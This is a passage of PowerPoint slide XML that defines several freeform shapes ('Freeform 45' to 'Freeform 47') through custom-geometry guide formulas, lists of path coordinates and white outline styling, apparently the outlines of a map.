                    <a:lnTo>
                      <a:pt x="12" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="27"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36313" name="Freeform 45"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4466" y="2876"/>
                <a:ext cx="158" cy="136"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 140 w 158"/>
                  <a:gd name="T1" fmla="*/ 10 h 136"/>
                  <a:gd name="T2" fmla="*/ 131 w 158"/>
                  <a:gd name="T3" fmla="*/ 12 h 136"/>
                  <a:gd name="T4" fmla="*/ 132 w 158"/>
                  <a:gd name="T5" fmla="*/ 17 h 136"/>
                  <a:gd name="T6" fmla="*/ 139 w 158"/>
                  <a:gd name="T7" fmla="*/ 26 h 136"/>
                  <a:gd name="T8" fmla="*/ 141 w 158"/>
                  <a:gd name="T9" fmla="*/ 37 h 136"/>
                  <a:gd name="T10" fmla="*/ 149 w 158"/>
                  <a:gd name="T11" fmla="*/ 46 h 136"/>
                  <a:gd name="T12" fmla="*/ 154 w 158"/>
                  <a:gd name="T13" fmla="*/ 56 h 136"/>
                  <a:gd name="T14" fmla="*/ 141 w 158"/>
                  <a:gd name="T15" fmla="*/ 55 h 136"/>
                  <a:gd name="T16" fmla="*/ 135 w 158"/>
                  <a:gd name="T17" fmla="*/ 68 h 136"/>
                  <a:gd name="T18" fmla="*/ 136 w 158"/>
                  <a:gd name="T19" fmla="*/ 77 h 136"/>
                  <a:gd name="T20" fmla="*/ 130 w 158"/>
                  <a:gd name="T21" fmla="*/ 82 h 136"/>
                  <a:gd name="T22" fmla="*/ 115 w 158"/>
                  <a:gd name="T23" fmla="*/ 98 h 136"/>
                  <a:gd name="T24" fmla="*/ 119 w 158"/>
                  <a:gd name="T25" fmla="*/ 106 h 136"/>
                  <a:gd name="T26" fmla="*/ 118 w 158"/>
                  <a:gd name="T27" fmla="*/ 112 h 136"/>
                  <a:gd name="T28" fmla="*/ 112 w 158"/>
                  <a:gd name="T29" fmla="*/ 121 h 136"/>
                  <a:gd name="T30" fmla="*/ 97 w 158"/>
                  <a:gd name="T31" fmla="*/ 132 h 136"/>
                  <a:gd name="T32" fmla="*/ 90 w 158"/>
                  <a:gd name="T33" fmla="*/ 133 h 136"/>
                  <a:gd name="T34" fmla="*/ 85 w 158"/>
                  <a:gd name="T35" fmla="*/ 122 h 136"/>
                  <a:gd name="T36" fmla="*/ 78 w 158"/>
                  <a:gd name="T37" fmla="*/ 125 h 136"/>
                  <a:gd name="T38" fmla="*/ 71 w 158"/>
                  <a:gd name="T39" fmla="*/ 120 h 136"/>
                  <a:gd name="T40" fmla="*/ 63 w 158"/>
                  <a:gd name="T41" fmla="*/ 115 h 136"/>
                  <a:gd name="T42" fmla="*/ 57 w 158"/>
                  <a:gd name="T43" fmla="*/ 122 h 136"/>
                  <a:gd name="T44" fmla="*/ 49 w 158"/>
                  <a:gd name="T45" fmla="*/ 125 h 136"/>
                  <a:gd name="T46" fmla="*/ 46 w 158"/>
                  <a:gd name="T47" fmla="*/ 119 h 136"/>
                  <a:gd name="T48" fmla="*/ 31 w 158"/>
                  <a:gd name="T49" fmla="*/ 118 h 136"/>
                  <a:gd name="T50" fmla="*/ 22 w 158"/>
                  <a:gd name="T51" fmla="*/ 116 h 136"/>
                  <a:gd name="T52" fmla="*/ 20 w 158"/>
                  <a:gd name="T53" fmla="*/ 107 h 136"/>
                  <a:gd name="T54" fmla="*/ 15 w 158"/>
                  <a:gd name="T55" fmla="*/ 88 h 136"/>
                  <a:gd name="T56" fmla="*/ 5 w 158"/>
                  <a:gd name="T57" fmla="*/ 81 h 136"/>
                  <a:gd name="T58" fmla="*/ 4 w 158"/>
                  <a:gd name="T59" fmla="*/ 74 h 136"/>
                  <a:gd name="T60" fmla="*/ 3 w 158"/>
                  <a:gd name="T61" fmla="*/ 64 h 136"/>
                  <a:gd name="T62" fmla="*/ 0 w 158"/>
                  <a:gd name="T63" fmla="*/ 55 h 136"/>
                  <a:gd name="T64" fmla="*/ 5 w 158"/>
                  <a:gd name="T65" fmla="*/ 43 h 136"/>
                  <a:gd name="T66" fmla="*/ 11 w 158"/>
                  <a:gd name="T67" fmla="*/ 39 h 136"/>
                  <a:gd name="T68" fmla="*/ 22 w 158"/>
                  <a:gd name="T69" fmla="*/ 53 h 136"/>
                  <a:gd name="T70" fmla="*/ 34 w 158"/>
                  <a:gd name="T71" fmla="*/ 53 h 136"/>
                  <a:gd name="T72" fmla="*/ 43 w 158"/>
                  <a:gd name="T73" fmla="*/ 55 h 136"/>
                  <a:gd name="T74" fmla="*/ 53 w 158"/>
                  <a:gd name="T75" fmla="*/ 48 h 136"/>
                  <a:gd name="T76" fmla="*/ 63 w 158"/>
                  <a:gd name="T77" fmla="*/ 45 h 136"/>
                  <a:gd name="T78" fmla="*/ 75 w 158"/>
                  <a:gd name="T79" fmla="*/ 50 h 136"/>
                  <a:gd name="T80" fmla="*/ 83 w 158"/>
                  <a:gd name="T81" fmla="*/ 46 h 136"/>
                  <a:gd name="T82" fmla="*/ 99 w 158"/>
                  <a:gd name="T83" fmla="*/ 30 h 136"/>
                  <a:gd name="T84" fmla="*/ 105 w 158"/>
                  <a:gd name="T85" fmla="*/ 20 h 136"/>
                  <a:gd name="T86" fmla="*/ 106 w 158"/>
                  <a:gd name="T87" fmla="*/ 6 h 136"/>
                  <a:gd name="T88" fmla="*/ 114 w 158"/>
                  <a:gd name="T89" fmla="*/ 0 h 136"/>
                  <a:gd name="T90" fmla="*/ 129 w 158"/>
                  <a:gd name="T91" fmla="*/ 1 h 136"/>
                  <a:gd name="T92" fmla="*/ 138 w 158"/>
                  <a:gd name="T93" fmla="*/ 4 h 1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158"/>
                  <a:gd name="T142" fmla="*/ 0 h 136"/>
                  <a:gd name="T143" fmla="*/ 158 w 158"/>
                  <a:gd name="T144" fmla="*/ 136 h 1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158" h="136">
                    <a:moveTo>
                      <a:pt x="138" y="4"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="138" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="4"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36314" name="Freeform 46"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4626" y="3094"/>
                <a:ext cx="26" cy="15"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 22 w 26"/>
                  <a:gd name="T1" fmla="*/ 15 h 15"/>
                  <a:gd name="T2" fmla="*/ 20 w 26"/>
                  <a:gd name="T3" fmla="*/ 14 h 15"/>
                  <a:gd name="T4" fmla="*/ 14 w 26"/>
                  <a:gd name="T5" fmla="*/ 10 h 15"/>
                  <a:gd name="T6" fmla="*/ 8 w 26"/>
                  <a:gd name="T7" fmla="*/ 7 h 15"/>
                  <a:gd name="T8" fmla="*/ 5 w 26"/>
                  <a:gd name="T9" fmla="*/ 6 h 15"/>
                  <a:gd name="T10" fmla="*/ 2 w 26"/>
                  <a:gd name="T11" fmla="*/ 5 h 15"/>
                  <a:gd name="T12" fmla="*/ 0 w 26"/>
                  <a:gd name="T13" fmla="*/ 4 h 15"/>
                  <a:gd name="T14" fmla="*/ 1 w 26"/>
                  <a:gd name="T15" fmla="*/ 2 h 15"/>
                  <a:gd name="T16" fmla="*/ 3 w 26"/>
                  <a:gd name="T17" fmla="*/ 1 h 15"/>
                  <a:gd name="T18" fmla="*/ 10 w 26"/>
                  <a:gd name="T19" fmla="*/ 1 h 15"/>
                  <a:gd name="T20" fmla="*/ 14 w 26"/>
                  <a:gd name="T21" fmla="*/ 0 h 15"/>
                  <a:gd name="T22" fmla="*/ 16 w 26"/>
                  <a:gd name="T23" fmla="*/ 2 h 15"/>
                  <a:gd name="T24" fmla="*/ 24 w 26"/>
                  <a:gd name="T25" fmla="*/ 8 h 15"/>
                  <a:gd name="T26" fmla="*/ 26 w 26"/>
                  <a:gd name="T27" fmla="*/ 10 h 15"/>
                  <a:gd name="T28" fmla="*/ 25 w 26"/>
                  <a:gd name="T29" fmla="*/ 13 h 15"/>
                  <a:gd name="T30" fmla="*/ 24 w 26"/>
                  <a:gd name="T31" fmla="*/ 14 h 15"/>
                  <a:gd name="T32" fmla="*/ 22 w 26"/>
                  <a:gd name="T33" fmla="*/ 15 h 1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6"/>
                  <a:gd name="T52" fmla="*/ 0 h 15"/>
                  <a:gd name="T53" fmla="*/ 26 w 26"/>
                  <a:gd name="T54" fmla="*/ 15 h 15"/>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6" h="15">
                    <a:moveTo>
                      <a:pt x="22" y="15"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="20" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="15"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36315" name="Freeform 47"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4698" y="3078"/>
                <a:ext cx="59" cy="30"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 59"/>
                  <a:gd name="T1" fmla="*/ 30 h 30"/>
                  <a:gd name="T2" fmla="*/ 2 w 59"/>
                  <a:gd name="T3" fmla="*/ 27 h 30"/>
                  <a:gd name="T4" fmla="*/ 2 w 59"/>
                  <a:gd name="T5" fmla="*/ 23 h 30"/>
                  <a:gd name="T6" fmla="*/ 3 w 59"/>
                  <a:gd name="T7" fmla="*/ 21 h 30"/>
                  <a:gd name="T8" fmla="*/ 8 w 59"/>
                  <a:gd name="T9" fmla="*/ 17 h 30"/>
                  <a:gd name="T10" fmla="*/ 18 w 59"/>
                  <a:gd name="T11" fmla="*/ 13 h 30"/>
                  <a:gd name="T12" fmla="*/ 23 w 59"/>
                  <a:gd name="T13" fmla="*/ 9 h 30"/>
                  <a:gd name="T14" fmla="*/ 26 w 59"/>
                  <a:gd name="T15" fmla="*/ 5 h 30"/>
                  <a:gd name="T16" fmla="*/ 29 w 59"/>
                  <a:gd name="T17" fmla="*/ 4 h 30"/>
                  <a:gd name="T18" fmla="*/ 40 w 59"/>
                  <a:gd name="T19" fmla="*/ 3 h 30"/>
                  <a:gd name="T20" fmla="*/ 47 w 59"/>
                  <a:gd name="T21" fmla="*/ 2 h 30"/>
                  <a:gd name="T22" fmla="*/ 51 w 59"/>
                  <a:gd name="T23" fmla="*/ 1 h 30"/>
                  <a:gd name="T24" fmla="*/ 57 w 59"/>
                  <a:gd name="T25" fmla="*/ 0 h 30"/>
                  <a:gd name="T26" fmla="*/ 58 w 59"/>
                  <a:gd name="T27" fmla="*/ 1 h 30"/>
                  <a:gd name="T28" fmla="*/ 59 w 59"/>
                  <a:gd name="T29" fmla="*/ 2 h 30"/>
                  <a:gd name="T30" fmla="*/ 57 w 59"/>
                  <a:gd name="T31" fmla="*/ 4 h 30"/>
                  <a:gd name="T32" fmla="*/ 54 w 59"/>
                  <a:gd name="T33" fmla="*/ 6 h 30"/>
                  <a:gd name="T34" fmla="*/ 43 w 59"/>
                  <a:gd name="T35" fmla="*/ 10 h 30"/>
                  <a:gd name="T36" fmla="*/ 33 w 59"/>
                  <a:gd name="T37" fmla="*/ 13 h 30"/>
                  <a:gd name="T38" fmla="*/ 28 w 59"/>
                  <a:gd name="T39" fmla="*/ 15 h 30"/>
                  <a:gd name="T40" fmla="*/ 23 w 59"/>
                  <a:gd name="T41" fmla="*/ 18 h 30"/>
                  <a:gd name="T42" fmla="*/ 16 w 59"/>
                  <a:gd name="T43" fmla="*/ 25 h 30"/>
                  <a:gd name="T44" fmla="*/ 11 w 59"/>
                  <a:gd name="T45" fmla="*/ 28 h 30"/>
                  <a:gd name="T46" fmla="*/ 8 w 59"/>
                  <a:gd name="T47" fmla="*/ 29 h 30"/>
                  <a:gd name="T48" fmla="*/ 4 w 59"/>
                  <a:gd name="T49" fmla="*/ 30 h 30"/>
                  <a:gd name="T50" fmla="*/ 0 w 59"/>
                  <a:gd name="T51" fmla="*/ 30 h 3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59"/>
                  <a:gd name="T79" fmla="*/ 0 h 30"/>
                  <a:gd name="T80" fmla="*/ 59 w 59"/>
                  <a:gd name="T81" fmla="*/ 30 h 30"/>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59" h="30">
                    <a:moveTo>
                      <a:pt x="0" y="30"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
